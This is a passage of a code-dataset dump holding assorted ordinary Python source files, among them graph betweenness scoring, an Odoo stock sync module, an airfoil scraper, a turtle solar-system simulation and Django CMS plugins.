paramétriques\")\nplt.axis(\"equal\")\nplt.show()\n","sub_path":"tp4/tp4ex5.py","file_name":"tp4ex5.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"587622693","text":"import sys\n\n#mapping between node name and index used in adjacency_matrix\n#format: {\"1\":0,\"2\":1,...}\nnode_dict = {}\ninverse_node_dict = {}\nadjacency_matrix = []\n#keep 2 nodes that have edge for printing later\npairs = []\n\ndef readNodes(file_name):\n global node_dict\n global inverse_node_dict\n global adjacency_matrix\n \n for line in open(file_name):\n l = line.replace(\"\\n\",\"\")\n if(len(l)==0):\n break\n x,y = l.split(\" \")\n \n if(len(node_dict)==0):\n node_dict[x] = 0\n \n if(x not in node_dict):\n node_dict[x] = max(node_dict.values()) + 1\n if(y not in node_dict):\n node_dict[y] = max(node_dict.values()) + 1\n pairs.append([ min( int(x),int(y) ),max( int(x),int(y) ) ] ) \n \n #construct inverse dictionary also\n inverse_node_dict = {v: k for k, v in node_dict.items()} \n #construct adjacency_matrix\n number_nodes = len(node_dict)\n for i in range(number_nodes):\n adjacency_matrix.append([0] * number_nodes) \n \n for line in open(file_name):\n l = line.replace(\"\\n\",\"\")\n if(len(l)==0):\n break\n x,y = l.split(\" \")\n index_x = node_dict[x]\n index_y = node_dict[y]\n adjacency_matrix[index_x][index_y] = 1 \n adjacency_matrix[index_y][index_x] = 1 \n \ndef constructTree(root):\n #contains all nodes in upper levels\n #format {1:Node(1),2:Node(2),...}\n all_upper_nodes = {}\n #contains all nodes of the current level\n #format {1:Node(1),2:Node(2),...}\n current_level_nodes = {}\n #contains all nodes of the lower 1 level\n #format {1:Node(1),2:Node(2),...}\n current_child_nodes = {}\n \n rootNode = Node(node_name=root,sum_parent_count=0.0,num_parent=0)\n current_level_nodes[rootNode.node_name] = rootNode\n \n while(len(current_level_nodes)>0):\n for nodeObject in current_level_nodes.values():\n index = nodeObject.node_name\n rows = adjacency_matrix[index]\n #look for all nodes that this node connected to\n for connected_index,is_edge_exist in enumerate(rows):\n #no edge between node{index} and node{connected_index}\n if(is_edge_exist==0):\n continue\n #don't perform bfs at the parents\n if(connected_index in all_upper_nodes):\n continue\n #don't perform bfs on a node with the same level\n if(connected_index in current_level_nodes):\n continue\n #if a child node is already connected by some nodes before\n if(connected_index in current_child_nodes):\n childNode = current_child_nodes[connected_index]\n childNode.increaseParentCount()\n childNode.sum_parent_count = childNode.sum_parent_count + nodeObject.num_parent\n nodeObject.addChild(childNode)\n continue\n #create a new child node\n childNode = Node(connected_index,sum_parent_count=max(1.0,nodeObject.num_parent))\n nodeObject.addChild(childNode)\n #add a new chld node to current_child_nodes\n current_child_nodes[childNode.node_name] = childNode\n #add nodes in the current level into all_upper_nodes\n all_upper_nodes.update(current_level_nodes)\n #iterate overs nodes in the next lower level \n current_level_nodes = current_child_nodes\n current_child_nodes = {}\n \n return all_upper_nodes \n \nclass Node:\n #node_score = 0.0\n #edges = [(childnodeA,edgeScore_to_A),(childnodeB,edgeScore_to_B),...]\n def __init__(self,node_name,sum_parent_count,num_parent=1): \n self.node_name = node_name\n self.node_score = 0.0\n self.edges = []\n self.num_parent = num_parent\n self.sum_parent_count = sum_parent_count\n \n def addChild(self, child_node, edge_score = 0.0):\n self.edges.append((child_node,edge_score)) \n \n def increaseParentCount(self):\n self.num_parent += 1 \n \n def __str__(self):\n original_name = inverse_node_dict[self.node_name]\n list_child_edges = []\n for edge in self.edges:\n childNode,edge_score = edge[0],edge[1]\n original_child_node_name = inverse_node_dict[childNode.node_name]\n list_child_edges.append((original_child_node_name,edge_score))\n return \"nodeName:{0},childEdges({1}),num_parent:{2},nodeScore:{3}\".format(original_name,list_child_edges,self.num_parent,self.node_score)\n \n def computeScore(self):\n #if this is a leaf node\n if(len(self.edges)==0):\n self.node_score = 1.0\n return self.node_score\n \n #adjust the current score to its number of parents otherwise\n self.node_score = max(1.0,self.num_parent)\n \n accum_score = 0.0\n #update score of edges connected to all of its leaf nodes\n new_edges = []\n for child_edge in self.edges:\n childNode = child_edge[0]\n child_score = childNode.computeScore()\n edge_score = self.node_score / childNode.sum_parent_count\n edge_score = edge_score * child_score\n new_edges.append((childNode,edge_score))\n accum_score += edge_score\n self.edges = new_edges\n #update score of itself\n self.node_score = accum_score + 1.0\n return self.node_score\n \nif __name__ == '__main__': \n file_name = sys.argv[1]\n readNodes(file_name)\n #construct edge-score matrix\n edge_score_matrix = []\n for i in range(len(adjacency_matrix)):\n edge_score_matrix.append([0.0] * len(adjacency_matrix)) \n \n #loop through every nodes and add up score for each edge\n for i in range(len(node_dict)): \n root_index = i\n result = constructTree(root_index)\n rootNode = result[root_index]\n rootNode.computeScore()\n for i_index,nodeObject in result.iteritems():\n for edge in nodeObject.edges:\n childNode,edge_score = edge[0],edge[1]\n j_index = childNode.node_name\n edge_score_matrix[i_index][j_index] = edge_score_matrix[i_index][j_index] + edge_score\n edge_score_matrix[j_index][i_index] = edge_score_matrix[i_index][j_index]\n \n #divide every scores by 2\n for i in range(len(edge_score_matrix)):\n for j in range(len(edge_score_matrix)):\n edge_score_matrix[i][j] = edge_score_matrix[i][j] / 2.0\n \n #print out the result \n pairs = sorted(pairs) \n for pair in pairs:\n i_index = node_dict[str(pair[0])]\n j_index = node_dict[str(pair[1])]\n print(\"{0} {1}\".format(pair,edge_score_matrix[i_index][j_index])) \n ","sub_path":"Assignment5/nakareseisoon_vitid_betweenness.py","file_name":"nakareseisoon_vitid_betweenness.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433047781","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport logging\nimport numpy as np\nimport pandas as pd\nfrom keras.losses import mean_squared_error, huber_loss\nfrom keras.optimizers import Adadelta, SGD, Adam\n\nfrom fetal_brain_assessment.resnet_architecture import model_architecture as create_model_architecture\n\nlogger = logging.getLogger(__name__)\n\n\nclass Predictor:\n\tdef __init__(self, weights='/usr/local/share/fetal_brain_assessment/weights_resnet.hdf5'):\n\t\tlogger.debug('Creating model')\n\t\tself.model = create_model_architecture()\n\t\tlogger.debug('Model created')\n\n\t\tself.model.compile(\n\t\t\tloss=lambda y_true, y_pred: huber_loss(y_true, y_pred, delta=0.15),\n\t\t\toptimizer=Adam(lr=0.0001),\n\t\t\tmetrics=['mean_absolute_error'])\n\t\tlogger.debug('Model compiled')\n\t\tlogger.debug('Loading resnet weights from %s', weights)\n\t\tself.model.load_weights(weights)\n\t\tlogger.debug('Predictor object setup complete.')\n\n\tdef predict(self, stacked_data, row_names) -> pd.DataFrame:\n\t\tstacked_data = np.array(stacked_data, dtype=np.float32)\n\n\t\t# Normalize dataset\n\t\tmin1 = np.amin(stacked_data)\n\t\t# max1 = np.amax(volumes)\n\t\tmax1 = 10000\n\t\tlogger.info('Min: %s', min1)\n\t\tlogger.info('Max: %s', max1)\n\t\tstacked_data = (stacked_data - min1) / (max1 - min1)\n\t\tmin1 = np.amin(stacked_data)\n\t\tmax1 = np.amax(stacked_data)\n\t\tlogger.info('New min: %s', min1)\n\t\tlogger.info('New max: %s', max1)\n\n\t\tlogger.debug('Doing prediction')\n\t\tprediction = self.model.predict(stacked_data, verbose=1 if logger.level < 25 else 0)\n\n\t\tdf = pd.DataFrame(row_names, columns=['filename'])\n\t\tdf['quality'] = prediction\n\t\treturn df\n","sub_path":"fetal_brain_assessment/predict_resnet.py","file_name":"predict_resnet.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"549328958","text":"#coding=utf-8\nfrom openpyxl.workbook.workbook import Workbook\nfrom openpyxl.reader.excel import load_workbook\n\ndef excel_read(path):\n wb = load_workbook(path)\n sheet = wb.active\n return sheet\n# max_row = sheet.max_row\n# \n# for i in range(1,max_row+1):\n# if not sheet.cell(row=i,column=3).value:\n# continue\n# flag = UrlRedis.add_url(sheet.cell(row=i,column=3).value)\n# if flag:\n# continue\n \ndef get_excel_data(path=None,sheet=None,row_id=1):\n sheet = sheet or(excel_read(path) if path else None)\n container = []\n max_column = sheet.max_column \n for i in range(row_id,max_column+1):\n if not sheet.cell(row=1,column=i).value:\n continue\n container.append(sheet.cell(row=1,column=i).value)\n return container\n \n# def get_single_row_data(path=None,sheet=None,row_id=1):\n# get_title()\n\ndef get_single_column_data(sheet,colum_id):\n container = []\n max_row = sheet.max_row \n for i in range(3,max_row+1):\n if not sheet.cell(row=i,column=colum_id).value:\n continue\n container.append(sheet.cell(row=i,column=colum_id).value)\n return container\n\ndef get_excel_cell_data(sheet,row,column):\n v = sheet.cell(row=row,column=column).value\n return v if v else None \n \n ","sub_path":"spider/demo/test/education_crawler/utils/self_excel.py","file_name":"self_excel.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"639335424","text":"\nfile_name_list = [\"Backdoor\", \"Benign\", \"Rootkit\", \"Trojan\", \"Virus\", \"Worm\"]\ndata_header = []\ndata = {}\nfor i in range(file_name_list.__len__()):\n current_name = file_name_list[i]\n file_path = 'csv/' + current_name + '.csv'\n file = open(file_path, 'r')\n line = file.readline()\n if( i==0 ):\n data_header = line.split(\",\")\n\n data_samples = []\n while line:\n line = file.readline()\n data_samples.append(line.split(\",\"))\n\n data[current_name.lower()] = data_samples\n\n\nfor name in data_header:\n print(name)\n\ncount = 0\nfor keys in data.keys():\n print(keys)\n count += 1\n for line in data[keys]:\n print(line)\n","sub_path":"Python/preprocessing/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"464613388","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api, fields\nfrom odoo.exceptions import ValidationError\n\n\nclass StockPicking(models.Model):\n _inherit = 'stock.picking'\n\n sync_state = fields.Selection([('draft', '草稿'), ('no_need', '不需要'), ('done', '完成')], '同步中台状态', default='no_need', track_visibility='onchange')\n can_sync = fields.Boolean('是否可以同步到中台', compute='_compute_can_sync')\n\n # cancel_sync_state = fields.Selection([('draft', '草稿'), ('no_need', '不需要'), ('done', '完成')], '取消同步中台状态', default='no_need',\n # track_visibility='onchange', help='订单取消后同步到中台状态')\n # can_cancel_sync = fields.Boolean('取消是否可以同步到中台', compute='_compute_can_sync')\n\n @api.multi\n def do_push_mustang(self):\n \"\"\"同步到中台\"\"\"\n if self.initiate_system != 'ERP':\n raise ValidationError('非ERP单据不需要同步到中台!')\n\n if self.backorder_id:\n raise ValidationError('此单为后续单据,不需要同步到中台!')\n\n if self.state in ['draft', 'cancel']:\n raise ValidationError('草稿状态或取消状态的单据不能同步!')\n\n if self.sync_state != 'draft':\n raise ValidationError('同步中台状态非草稿,不能同步!')\n\n self.env['cj.send']._cron_push_picking_mustang(self)\n\n # @api.multi\n # def do_cancel_push_mustang(self):\n # \"\"\"取消同步到中台\"\"\"\n # if self.initiate_system != 'ERP':\n # raise ValidationError('非ERP单据不需要同步到中台!')\n #\n # if self.state != 'cancel':\n # raise ValidationError('非取消状态的单据不能同步取消到中台!')\n #\n # if self.cancel_sync_state != 'draft':\n # raise ValidationError('取消是否可以同步到中台非草稿,不能同步!')\n #\n # self.env['cj.send']._cron_push_cancel_picking_mustang(self)\n\n @api.multi\n def _compute_can_sync(self):\n for picking in self:\n if picking.initiate_system != 'ERP':\n continue\n\n if picking.state not in ['draft', 'cancel'] and picking.sync_state == 'draft':\n picking.can_sync = True\n\n # if picking.backorder_id:\n # if picking.state == 'cancel' and picking.cancel_sync_state == 'draft':\n # picking.can_cancel_sync = True\n # else:\n # if picking.state not in ['draft', 'cancel'] and picking.sync_state == 'draft':\n # picking.can_sync = True\n\n # if picking.state == 'cancel' and picking.cancel_sync_state == 'draft':\n # picking.can_cancel_sync = True\n\n # @api.multi\n # def action_cancel(self):\n # res = super(StockPicking, self).action_cancel()\n # self.cancel_sync_state = 'draft'\n # return res\n\n # @api.one\n # def action_done(self):\n # across_obj = self.env['stock.across.move'] # 跨公司调拨\n #\n # res = super(StockPicking, self).action_done()\n # if self.purchase_id:\n # across = across_obj.search([('purchase_order_id', '=', self.purchase_id.id)])\n # if across and across.origin_sale_order_id:\n # order = across.origin_sale_order_id\n # picking = list(order.picking_ids.filtered(lambda x: x.state not in ['draft', 'cancel', 'done']))\n # picking = picking and picking[0]\n # if picking:\n # # 检查可用状态\n # if picking.state != 'assigned':\n # picking.action_assign()\n #\n # if picking.state == 'assigned':\n # picking.button_validate() # 确认出库\n #\n # return res\n\n\n","sub_path":"myaddons/cj_api/models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"356346798","text":"\"\"\"Provides an App class.\"\"\"\n\nfrom ..auth import Client\nfrom .resource import Resource\n\n\nclass App(Resource):\n \"\"\"A simple abstraction over a Swimlane app.\"\"\"\n\n def __init__(self, fields):\n \"\"\"Init an App with fields.\n\n Args:\n fields (dict): A dict of fields and values\n \"\"\"\n super(App, self).__init__(fields)\n\n def field_id(self, name):\n \"\"\"Get the field ID of a field by name.\n\n Args:\n name (str): The name of the field.\n\n Returns:\n A field ID as a str.\n \"\"\"\n return next((f[\"id\"] for f in self.fields if f[\"name\"] == name), None)\n\n def save(self):\n \"\"\"Create/update the app.\"\"\"\n if hasattr(self, 'id') and self.id:\n self._fields = Client.put(self, 'app/{}'.format(self.id))\n else:\n self._fields = Client.post(self, 'app')\n\n @classmethod\n def find_all(cls):\n \"\"\"List all apps.\n\n Returns:\n A generator that yields all apps in the system.\n \"\"\"\n return (App(x) for x in Client.get(\"app/\"))\n\n @classmethod\n def find(cls, app_id=None, name=None, acronym=None):\n \"\"\"Find an application.\n\n Args:\n app_id (str): The app ID\n name (str): The app name\n acronym (str): The app acronym\n\n Returns:\n A resource that matches the fields\n \"\"\"\n if app_id:\n return App(Client.get(\"app/{0}\".format(app_id)))\n\n else:\n apps = cls.find_all()\n for app in apps:\n if any([\n name and name == getattr(app, 'name', None),\n acronym and acronym == getattr(app, 'acronym', None)\n ]):\n return app\n","sub_path":"swimlane/core/resources/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"261619210","text":"# coding: utf-8\n# license: GPLv3\n\nimport tkinter as tk\nfrom tkinter import filedialog\n\nfrom solar_vis import *\nfrom solar_model import *\nfrom solar_input import *\nfrom solar_graph import *\nimport thorpy\nimport time\nimport numpy as np\n\nroot = tk.Tk()\nroot.withdraw()\n\ntimer = None\n\nalive = True\n\nperform_execution = False\n\"\"\"Флаг цикличности выполнения расчёта\"\"\"\n\nmodel_time = 0\n\"\"\"Физическое время от начала расчёта.\nТип: float\"\"\"\n\ntime_scale = 1000.0\n\"\"\"Шаг по времени при моделировании.\nТип: float\"\"\"\n\nspace_objects = []\n\"\"\"Список космических объектов.\"\"\"\n\n\ndef execution(delta):\n \"\"\"Функция исполнения -- выполняется циклически, вызывая обработку всех небесных тел,\n а также обновляя их положение на экране.\n Цикличность выполнения зависит от значения глобальной переменной perform_execution.\n При perform_execution == True функция запрашивает вызов самой себя по таймеру через от 1 мс до 100 мс.\n \"\"\"\n global model_time\n global displayed_time\n recalculate_space_objects_positions([dr for dr in space_objects], delta)\n model_time += delta\n\n\ndef start_execution():\n \"\"\"Обработчик события нажатия на кнопку Start.\n Запускает циклическое исполнение функции execution.\n \"\"\"\n global perform_execution\n perform_execution = True\n\n\ndef pause_execution():\n global perform_execution\n perform_execution = False\n\n\ndef stop_execution():\n \"\"\"Обработчик события нажатия на кнопку Start.\n Останавливает циклическое исполнение функции execution.\n \"\"\"\n global alive\n alive = False\n\n\ndef open_file():\n \"\"\"Открывает диалоговое окно выбора имени файла и вызывает\n функцию считывания параметров системы небесных тел из данного файла.\n Считанные объекты сохраняются в глобальный список space_objects\n \"\"\"\n global space_objects\n global browser\n global model_time\n\n file_dir = filedialog.askopenfilename(initialdir=\"*\")\n space_objects = read_space_objects_data_from_file(file_dir)\n model_time = 0.0\n max_distance = max([max(abs(obj.x), abs(obj.y)) for obj in space_objects])\n calculate_scale_factor(max_distance)\n\n\ndef handle_events(events, menu):\n global alive\n for event in events:\n menu.react(event)\n if event.type == pg.QUIT:\n alive = False\n\n\ndef slider_to_real(val):\n return np.exp(5 + val)\n\n\ndef slider_reaction(event):\n global time_scale\n time_scale = slider_to_real(event.el.get_value())\n\n\ndef init_ui(screen):\n slider = thorpy.SliderX(100, (5, 15), \"Simulation speed\")\n slider.user_func = slider_reaction\n button_stop = thorpy.make_button(\"Quit\", func=stop_execution)\n button_pause = thorpy.make_button(\"Pause\", func=pause_execution)\n button_play = thorpy.make_button(\"Play\", func=start_execution)\n timer = thorpy.OneLineText(\"Seconds passed\")\n\n button_load = thorpy.make_button(text=\"Load a file\", func=open_file)\n\n box = thorpy.Box(elements=[\n slider,\n button_pause,\n button_stop,\n button_play,\n button_load,\n timer])\n reaction1 = thorpy.Reaction(reacts_to=thorpy.constants.THORPY_EVENT,\n reac_func=slider_reaction,\n event_args={\"id\": thorpy.constants.EVENT_SLIDE},\n params={},\n reac_name=\"slider reaction\")\n box.add_reaction(reaction1)\n\n menu = thorpy.Menu(box)\n for element in menu.get_population():\n element.surface = screen\n\n box.set_topleft((0, 0))\n box.blit()\n box.update()\n return menu, box, timer\n\n\ndef check_graph_availability(objects):\n stars = 0\n planets = 0\n for obj in objects:\n if obj.type == 'Planet':\n planets += 1\n if obj.type == 'Star':\n stars += 1\n if stars == 1 and planets == 1:\n return True\n else:\n return False\n\n\ndef main():\n \"\"\"Главная функция главного модуля.\n Создаёт объекты графического дизайна библиотеки tkinter: окно, холст, фрейм с кнопками, кнопки.\n \"\"\"\n\n global time_step\n global time_speed\n global space\n global start_button\n global perform_execution\n global timer\n\n print('Modelling started!')\n\n pg.init()\n\n output_file = 'output.txt'\n out = open(output_file, 'w')\n out.close()\n\n width = 1400\n height = 800\n screen = pg.display.set_mode((width, height))\n last_time = time.perf_counter()\n drawer = Drawer(screen)\n menu, box, timer = init_ui(screen)\n perform_execution = True\n\n gr = Graph()\n\n while alive:\n gr_drawing_flag = check_graph_availability(space_objects)\n handle_events(pg.event.get(), menu)\n cur_time = time.perf_counter()\n if perform_execution:\n execution((cur_time - last_time) * time_scale)\n text = \"%d seconds passed\" % (int(model_time))\n timer.set_text(text)\n\n last_time = cur_time\n drawer.update(space_objects, box)\n\n write_space_objects_data_to_file(output_file, space_objects, model_time)\n\n if gr_drawing_flag:\n gr.gain_data(space_objects, model_time)\n\n print('Modelling finished!')\n pg.quit()\n\n if gr_drawing_flag:\n gr.show_plot()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"solar_main.py","file_name":"solar_main.py","file_ext":"py","file_size_in_byte":5956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"145349961","text":"g = int(input())\nwhile g>0:\n n,k = map(int,input().split())\n a = [int(x) for x in input().split()]\n a.sort()\n count1,count2=0,0\n s = sum(a)\n for i in range(0,k):\n count1 += a[i]\n \n for i in range(n-1,n-k-1,-1):\n count2 += a[i]\n \n print(max(abs(count1-(s-count1)),abs(count2-(s-count2))))\n g-=1","sub_path":"python/MAXDIFF.py","file_name":"MAXDIFF.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"359498055","text":"from requests import get\nfrom bs4 import BeautifulSoup\n\nfrom bitflow.utils.module import Module\n\n'''\nA simple scraper that catalogs a list of airfoils to download.\nMakes data scraping more efficient, since multiple airfoils are downloaded in parallel once cataloged.\n'''\n\nTOOLS_URL = \"http://airfoiltools.com\"\nSEARCH_URL = \"http://airfoiltools.com/search/airfoils\"\n\ndef scrape_airfoil_list():\n '''\n Paht's original code, mostly unchanged.\n Parses HTML from airfoiltools.com to get a list of airfoils, and return their names and urls\n '''\n raw_html = get(SEARCH_URL).content\n html = BeautifulSoup(raw_html, 'html.parser')\n airfoilURLList = html.findAll(\"table\", {\"class\": \"listtable\"})\n tableRows = airfoilURLList[0].findAll(\"tr\")\n urls = []\n names = []\n for row in tableRows: # Search through all tables \n airfoil_link = row.find(lambda tag: tag.name==\"a\" and tag.has_attr('href'))\n if (airfoil_link):\n urls.append(TOOLS_URL + airfoil_link['href'])\n names.append(airfoil_link.text.replace(\"\\\\\", \"_\").replace(\"/\",\"_\"))\n return zip(urls, names)\n\n\nclass AirfoilList(Module):\n '''\n Pipeline module for listing airfoil names and urls and feeding them to a downloader\n '''\n def __init__(self, in_label=None, out_label='AirfoilURL', connect_labels=None, name='AirfoilList'):\n Module.__init__(self, in_label, out_label, connect_labels, name)\n\n def process(self):\n for url, name in scrape_airfoil_list():\n yield self.default_transaction(dict(name=name, url=url), uuid=url)\n","sub_path":"modules/airfoils/AirfoilList.py","file_name":"AirfoilList.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"588615106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 11 10:06:53 2019\n\n@author: naif\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('bigData.csv')\nX=dataset.iloc[:,[1,2,3,4,5]].values\ny=dataset.iloc[:,[6]].values\n#print(X)\n#print(y)\nfrom sklearn.preprocessing import LabelEncoder\nle = LabelEncoder()\nX[:,1]= le.fit_transform(X[:,1])\nprint(X[:,1])\nX[:,3]= le.fit_transform(X[:,3])\nprint(X[:,3])\nprint(X)\nprint(y)\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)\n\nprint(X_train)\nprint(y_train)\nfrom sklearn.tree import DecisionTreeRegressor\nreg = DecisionTreeRegressor( random_state = 0)\nreg.fit(X_train, y_train)\ny_pred=reg.predict(X_test) \nprint(y_pred)\nfrom sklearn.metrics import mean_squared_error,r2_score\nrms=np.sqrt(mean_squared_error(y_test,y_pred))\nprint(rms)\nr2_score=r2_score(y_test,y_pred)\nprint(r2_score)\n\n# Making the Confusion Matrix\n###rint(cm)","sub_path":"dicision.py","file_name":"dicision.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"77694544","text":"#Imports\nfrom random import randint\nfrom weapon import Weapon\n\n#Globals\n\n\n#Function\nclass Entity():\n \"\"\"docstring for Entity\"\"\"\n def __init__(self, name, health):\n self.name = name\n self.health = health\n self.max_health = health\n self.alive = True\n self.equipped_weapon = False\n self.attack_damage = 0\n self.critical_hit = 1\n\n def is_alive(self):\n if self.health == 0:\n self.alive = False\n return False\n return True\n\n def get_health(self):\n return self.health\n\n def take_damage(self, damage_points):\n\n if self.health <= damage_points:\n self.health = 0\n\n else:\n self.health -= damage_points\n\n return self.health\n\n def take_healing(self):\n\n healing_points = randint(0, self.max_health)\n\n healed = False\n\n if healing_points >= self.max_health - self.health and self.is_alive:\n healing_points -= (self.max_health - self.health)\n self.health += healing_points\n healed = True\n\n elif healing_points <= self.max_health - self.health and self.is_alive:\n self.health += healing_points\n healed = True\n\n else:\n healed\n\n return healed\n\n def has_weapon(self):\n\n return self.equipped_weapon\n\n def equip_weapon(self, weapon):\n self.weapon = weapon\n self.attack_damage = self.weapon.damage\n self.equipped_weapon = True\n\n def attack(self):\n\n if not self.equipped_weapon:\n self.critical_hit = 1\n\n else:\n if self.weapon.critical_hit():\n self.critical_hit = 2\n\n return self.attack_damage * self.critical_hit\n\n\nclass Hero(Entity):\n \"\"\"docstring for Hero\"\"\"\n def __init__(self, name, health, nickname):\n super().__init__(name, health)\n self.nickname = nickname\n self.race = \"Hero\"\n\n def known_as(self):\n return (\"{} {}\".format(self.name, self.nickname))\n\n\nclass Orc(Entity):\n \"\"\"docstring for Orc\"\"\"\n def __init__(self, name, health, berserk_factor):\n super().__init__(name, health)\n self.berserk_factor = berserk_factor\n self.race = \"Orc\"\n\n if self.berserk_factor > 2:\n self.berserk_factor = 2\n else:\n self.berserk_factor = 1\n\n def attack(self):\n\n if not self.equipped_weapon:\n self.critical_hit = 1\n\n else:\n if self.weapon.critical_hit():\n self.critical_hit = 2\n\n return self.attack_damage * self.critical_hit * self.berserk_factor\n","sub_path":"week2/DNP/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"544967937","text":"import json\nfrom os.path import join, dirname, exists\nfrom os import mkdir\n\nfrom pytezos import pytezos\nfrom conseil import conseil\nfrom conseil.api import ConseilApi\nfrom tests import relpath\nfrom tests.templates import big_map_test_case\n\nOperation = conseil.tezos.babylonnet.operations\n\ndata_dir = join(dirname(dirname(__file__)), 'tests/big_map_diff')\n\n\ndef get_transaction_with_big_map_diff(limit=1):\n return Operation.query(Operation.block_level, Operation.operation_group_hash) \\\n .filter(Operation.kind == 'transaction',\n Operation.paid_storage_size_diff > 20,\n Operation.parameters.isnot(None),\n Operation.internal.is_(False)) \\\n .limit(limit) \\\n .all()\n\n\ndef make_test(block_level, operation_group_hash):\n operation_dir = join(data_dir, operation_group_hash)\n if exists(operation_dir):\n return\n else:\n mkdir(operation_dir)\n\n opg = pytezos.shell.blocks[block_level].operations[operation_group_hash]()\n content = opg['contents'][0]\n try:\n big_map_diff = content['metadata']['operation_result']['big_map_diff']\n except (KeyError, IndexError, TypeError):\n return\n\n diff_path = join(operation_dir, 'big_map_diff.json')\n with open(diff_path, 'w+') as f:\n f.write(json.dumps(big_map_diff, indent=2))\n\n script = pytezos.shell.contracts[content['destination']]().get('script')\n code_path = join(operation_dir, 'storage_section.json')\n with open(code_path, 'w+') as f:\n f.write(json.dumps(script['code'][1], indent=2))\n\n test_case = big_map_test_case.format(\n case=operation_group_hash[:6],\n code_path=relpath(code_path),\n diff_path=relpath(diff_path)\n )\n with open(join(operation_dir, f'test_big_map_{operation_group_hash[:6]}.py'), 'w+') as f:\n f.write(test_case)\n\n\nif __name__ == '__main__':\n if not exists(data_dir):\n mkdir(data_dir)\n\n for data in get_transaction_with_big_map_diff(limit=400):\n make_test(**data)\n","sub_path":"scripts/make_big_map_tests.py","file_name":"make_big_map_tests.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"618079565","text":"import turtle as t\nimport time\n\n# 绘制太阳花\n\n# 设置线条颜色和填充颜色,也可以使用pencolor-画笔颜色,fillcolor-填充颜色\nt.setup(400,400)\nt.color(\"red\",\"yellow\")\n\nt.fd(-150)\nt.begin_fill()\nfor i in range(36):\n t.fd(200)\n t.left(170)\nt.end_fill()\n\nt.hideturtle()\nt.done() # 窗口不会自动关闭;若不添加,则窗口会自动关闭\n# t.mianloop() # 告诉窗口等待用户操作,窗口不自动关闭\n\n# 绘制五角星——先绘制红色的边和填充红色,外边再用黄色描边,然后写字\n# t.color(\"red\",\"red\")\n# t.begin_fill()\n# for i in range(5):\n# t.fd(200)\n# t.right(144)\n# t.end_fill()\n# t.pensize(5)\n# t.color(\"yellow\")\n# for i in range(5):\n# t.fd(77)\n# t.left(72)\n# t.fd(77)\n# t.right(144)\n#\n# t.penup()\n# t.goto(20,100)\n# t.color(\"red\")\n# t.write(\"我的祖国\",font=('Arial',30))\n# t.color(\"violet\")\n# t.goto(-10,-190)\n# t.write(\"为理想奋斗!\",font=('Arial',30))\n# t.hideturtle()\n#\n# t.mainloop()\n","sub_path":"python_abc/turtle_exercise.py","file_name":"turtle_exercise.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"190025884","text":"from cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\n\nfrom models import DividerPlugin\nfrom models import FeaturedBoxesPlugin, FeaturedBoxesItems\nfrom models import ParallaxPlugin\nfrom models import StandoutItemsPlugin, StandoutItems\nfrom models import CalloutPlugin\n\n\nfrom django.utils.translation import ugettext as _\n\nfrom django.contrib import admin\n\nBASE_TEMPLATE_PATH = 'cms_responsive/'\n\n\nclass CMSDividerPlugin(CMSPluginBase):\n model = DividerPlugin\n name = _(\"Responsive horizontal divider\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-default.html\"\n \n def render(self, context, instance, placeholder):\n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'object':object,\n 'settings': instance\n })\n return context\n\n\n\n\n\n\n# Featured boxes\nclass FeatureBoxesItemsInline(admin.StackedInline):\n model = FeaturedBoxesItems\n\nclass CMSFeaturedBoxesPlugin(CMSPluginBase):\n model = FeaturedBoxesPlugin\n name = _(\"Responsive featured boxes\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-entities.html\"\n inlines = (FeatureBoxesItemsInline,)\n \n def render(self, context, instance, placeholder):\n \n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'entities' : instance.featured_box_items.all(),\n 'object':object,\n 'settings': instance\n })\n return context\n\n\n\n\n\nclass StandoutItemsInline(admin.StackedInline):\n model = 